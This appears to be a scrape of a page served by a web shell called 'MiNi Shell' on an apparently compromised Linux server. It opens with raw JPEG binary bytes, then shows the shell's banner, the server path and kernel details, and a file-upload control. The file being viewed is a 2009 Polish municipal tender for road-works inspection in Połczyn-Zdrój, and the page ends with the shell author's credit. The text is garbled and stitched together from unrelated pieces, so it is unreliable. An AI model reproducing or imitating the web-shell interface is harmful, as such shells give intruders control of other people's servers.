JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090312/60734-N-2009.html

<p class="kh_header"><b>Połczyn-Zdrój: Pełnienie czynności Inspektora nadzoru dla przebudowy ulic : Zdrojowa i Parkowa</b><br>
<b>Numer ogłoszenia: 60734 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Połczynie-Zdroju , Plac Wolności 3-4, 78-320 Połczyn-Zdrój, woj. zachodniopomorskie, tel. 094 3662400, faks 094 3666105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polczyn-zdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie czynności Inspektora nadzoru dla przebudowy ulic : Zdrojowa i Parkowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na  pełnieniu czynności Inspektora nadzoru dla zadania inwestycyjnego p.n. Przebudowa ulic : Zdrojowej i Parkowej w Połczynie-Zdroju dla poprawy sieci powiązań dróg gminnych z powiatowymi i wojewódzkimi oraz zwiększenia bezpieczeństwa w strefie uzdrowiskowej i gospodarczym centrum miasta.

Ulice zlokalizowane są w ścisłym centrum miasta, ich stan techniczny obecnie jest zły. Przebudowa ma na celu odnowienie konstrukcji nawierzchni ulic i ciągów pieszych oraz budowę miejsc parkingowych wzdłuż ulic. Przebudowa objęta opracowaniem stanowić będzie kontynuację rozwiązania architektonicznego ścisłego centrum miasta.

Budowa, przebudowa i remont infrastruktury technicznej, drogowej ulic tj.:
  A.  [infrastruktura techniczna]: sieci wodociągowej;
       [infrastruktura techniczna]: sieci kanalizacji sanitarnej; 
       [infrastruktura techniczna]: sieci kanalizacji deszczowej; 
  B.  [infrastruktura drogowa]: przebudowa geometrii oraz podbudowy ulic, 
        odnowienie nawierzchni ulic i chodników; budowa miejsc postojowych;
  C. budową  miejsc postojowych;

wraz z urządzeniami budowlanymi związanymi z obiektem
  D. budowa przyłączy do sieci wodociągowej;
       budowa przyłączy do sieci kanalizacji sanitarnej;
       budowa przyłączy do sieci kanalizacji deszczowej;
  E. zagospodarowanie terenu;

Szczegółowy zakres i opis robót budowlanych zawiera - przedmiar robót , dokumentacja projektowa oraz Specyfikacja Techniczna Wykonania i Odbioru Robót.

Generalnie zadaniem Inspektora nadzoru jest pełnienie tej funkcji zgodnie z ustawą - Prawo budowlane. Inspektor nadzoru ma za zadanie czuwać nad prawidłową realizacją projektu oraz terminem realizacji prac.

PODSTAWOWE OBOWIĄZKI INSPEKTORA NADZORU W TRAKCIE PROWADZENIA ROBÓT BUDOWLANO-MONTAŻOWYCH POLEGAĆ BĘDĄ NA :
- przekazaniu Wykonawcy robót placu budowy,
- przejęciu od Wykonawcy robót uzgodnionych harmonogramów przedstawiających cykl realizacji inwestycji,
- stałym uczestnictwie w naradach technicznych koordynacyjnych i innych organizowanych przez wszystkie strony procesu inwestycyjnego,
- sprawdzaniu przez Inspektorów nadzoru w poszczególnych branżach kosztorysów 
  powykonawczych, obmiarów robót o ile zajdzie taka potrzeba oraz faktur za wykonane roboty wraz z ich opisaniem do zapłaty w terminie 5 dni od daty ich otrzymania.
- wydawaniu zgody na wykonanie ewentualnych robót dodatkowych po uprzedniej 
  konsultacji z Zamawiającym,
- podejmowaniu wszelkich racjonalnych działań umożliwiających prawidłową realizację harmonogramu,
- prowadzeniu pełno branżowego nadzoru technicznego nad realizacją robót zgodnie z prawem budowlanym (łącznie z przygotowaniem koniecznych dokumentów do uzyskania pozwolenia na użytkowanie) oraz kontroli wykonywanych robót zgodnie z przepisami bhp,
- sprawdzaniu i odbiorze robót budowlanych ulegających zakryciu lub zanikających, uczestniczeniu w próbach i odbiorach technicznych instalacji urządzeń technicznych oraz gotowego obiektu,
- współdziałaniu z Projektantem i Zamawiającym w zakresie zgodności realizacji inwestycji z projektem budowlanym,
- stałej konsultacji i doradztwie fachowym na rzecz Zamawiającego,
- współpracy z nadzorem autorskim (łącznie ze zmianami pozwoleń na budowę),
- sprawdzaniu jakości wbudowanych materiałów, a w szczególności zapobieganiu 
   zastosowania wyrobów wadliwych i nie dopuszczonych do stosowania w budownictwie zgodnie z obowiązującymi przepisami,
- kontrolowanie rozliczeń budowy - Inspektor nadzoru odpowiada przed Zamawiającym za nieprawidłowość dokonanych rozliczeń za roboty budowlano-montażowe,
- odbiór inwestycji w zgodzie z obowiązującymi przepisami.

Częstotliwość pobytu poszczególnych Inspektorów nadzoru na budowie powinna być taka, aby nie hamowała postępu robót, jednak nie mniej niż 1 raz w tygodniu.

Zwycięzca przetargu powinien w trakcie całego procesu inwestycyjnego podejmować także inne działania , nie wymienione powyżej , które zabezpieczać będą interes Zamawiającego i przyczynią się do sprawnego realizowania inwestycji.
                                                                   
WYMAGANIA STAWIANE WYKONAWCY:  - Wykonawca jest odpowiedzialny za jakość świadczonych usług,    - Wymagana jest należyta staranność przy realizacji zobowiązań umowy,   - Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.    - Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.    - Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące 
    warunki:
  1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli        
      ustawy  nakładają obowiązek posiadania takich uprawnień;
     Wykonawca jest zobowiązany przedstawić :
   - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
      ewidencji działalności   gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  
      rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie      
      wcześniej niż 6 miesięcy przed upływem terminu składania ofert                     
  1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
       i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
       innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
      zamówienia
      Wykonawca jest zobowiązany przedstawić :
   - oświadczenie , iż posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem
      technicznym oraz osobami zdolnymi do wykonania zamówienia ;
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
     zamówienia                                                                                                               
      Wykonawca jest zobowiązany przedstawić :
    - oświadczenie; iż znajduje się w sytuacji ekonomicznej i finansowej zapewniającej 
      wykonanie zamówienia     
 1.4.  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 
      Wykonawca jest zobowiązany przedstawić :
  - oświadczenie do postępowania o zamówienie publiczne w trybie art. 22 ust.l 
     ustawy Prawo zamówień publicznych.

2. Warunki szczegółowe wymagane od Wykonawców 
                                                                           - Minimalne wymagania kwalifikacyjne

2.1. Wykonawca musi być zarejestrowany jako zdolny do realizacji określonych prac ,
2.2.  wszystkie osoby uczestniczące w wykonaniu zamówienia winne posiadać przynajmniej 
    3-letnie doświadczenie oraz udowodnione kwalifikacje w zakresie wykonywania prac 
    o charakterze podobnym do przewidzianych w zamówieniu ,
2.3. Wykonawca musi posiadać zatrudnionych na umowę o pracę Inspektorów nadzoru 
    z uprawnieniami w następujących branżach :
    1/ drogowej
    2/ konstrukcyjno-budowlanej, 
    3/ instalacyjnej w zakresie sieci wodociągowych, kanalizacyjnych i elektrycznych, 
   oraz dokumenty potwierdzające ich przynależność do właściwych samorządów   
   zawodowych.
2.4. doświadczenie Wykonawcy :
     - w ciągu ostatnich 3 lat Wykonawca zrealizował min. jeden Kontrakt o zakresie 
       i charakterze porównywalnym i o wartości  prac  porównywalnej z ceną oferty,
2.5. Wykonawca winien posiadać polisę, a w przypadku jej braku inny dokument 
       potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
       w zakresie prowadzonej działalności. 


Zamawiający dokona oceny spełniania w/w warunków, stosując formułę spełnia/nie spełnia na podstawie dokumentów załączonych przez Wykonawców do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków określonych w Rozdziale III  SIWZ  
w tym, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004  - Prawo zamówień publicznych, Wykonawca składa następujące dokumenty.

  4.1. Dokumenty wymagane:
- formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1,  - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
   działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
   zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 
   6 miesięcy przed upływem terminu składania ofert, - dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z 
   przepisów prawa lub innych dokumentów rejestrowych,



- oświadczenie Wykonawcy o nie zaleganiu z opłacaniem podatków, opłat oraz składek na 
   ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane 
   prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
   w całości wykonania decyzji właściwego organu,
- oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 
   ust. 1 pkt 1-3 z wykorzystaniem wzoru- zał. nr 3 i nie wykluczeniu z postępowania na mocy    
   art.24 ust. 1 i 2  ustawy Prawo zamówień publicznych z wykorzystaniem wzoru- zał. nr 2,

4.2. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert; 2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

4.3. Dokumenty wymagane w przypadku składania oferty wspólnej.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
Ponadto oferta powinna zawierać :
- umowę regulującą współpracę podmiotów występujących wspólnie, - dokumenty formalne dla każdego partnera z osobna, pozostałe dokumenty składane są 
  wspólnie.  
4.4. Inne dokumenty:
   4.4.1. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, 
potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, Wykonawca składa następujące dokumenty :
- wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą 
  uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich 
  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania 
  zamówienia, a także zakresu wykonywanych przez nich czynności - wg wzoru na 
  zał. nr 4,



- pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do  
   wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej, Wykonawca 
   wskazał osoby, którymi będzie dysponował,
 - wykaz wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim  
    rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z 
    podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów 
    potwierdzających, że usługi te zostały wykonane należycie - wg wzoru na zał. nr 5,
 
  4.4.2. W celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w  
       sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy 
       złożyć następujące dokumenty: 
    - polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca   
  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  
  działalności.  

4.5. Dokumenty dodatkowe          - parafowany projekt umowy wg wzoru na zał. nr 6 ,

5. Postanowienia dotyczące składanych dokumentów.      5.1. Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii 
       potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do 
       podpisania oferty z dopiskiem za zgodność z oryginałem.     5.2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język 
       polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.polczyn-zdroj.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Połczynie-Zdroju            
Plac Wolności 3-4            
78-320 Połczyn-Zdrój.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy w Połczynie-Zdroju            
Plac Wolności 3-4            
78-320 Połczyn-Zdrój 
Sekretariat ( I piętro) lub Pokój nr 206 ( II piętro ).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com